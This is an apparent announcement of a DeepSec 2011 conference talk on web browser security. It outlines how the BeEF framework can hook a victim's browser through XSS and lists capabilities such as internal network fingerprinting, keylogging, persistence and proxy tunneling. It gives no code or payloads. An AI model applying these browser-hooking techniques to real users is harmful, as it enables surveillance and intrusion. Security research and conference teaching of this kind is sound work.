Michele Orru held a presentation about web browser security at the DeepSec 2011 security conference:
Browser security is still one of the trickiest challenges to afford nowadays. A lot of efforts has been spent on mitigating browser exploitation from heap and stack overflows, pointers dereference and other memory corruption bugs. On the other hand there is still an almost unexplored landscape.
X-Frame-Options, X-XSS-Protection, Content Security Policy, DOM sandboxing are good starting points to mitigate the XSS plague, but they are still not widely implemented.
We will see how a framework like BeEF can be used to abuse the security
context of a browser. As we are able to manipulate the DOM for fun and
profit in 95% of web applications, a trivial reflected or DOM-based XSS is
enough to hook a victim browser to BeEF and control it completely.
The presentation will cover the following main areas, between the many:
Cutting: stealth activities, target enumeration and analysis, comman
Devouring: internal network fingerprint via JS, exploiting internal
services through the browser, keylogging, browser pwnage, autopwn.
Digesting: persistence, tunneling sqlmap/Burp through BeEF proxy, XSS Rays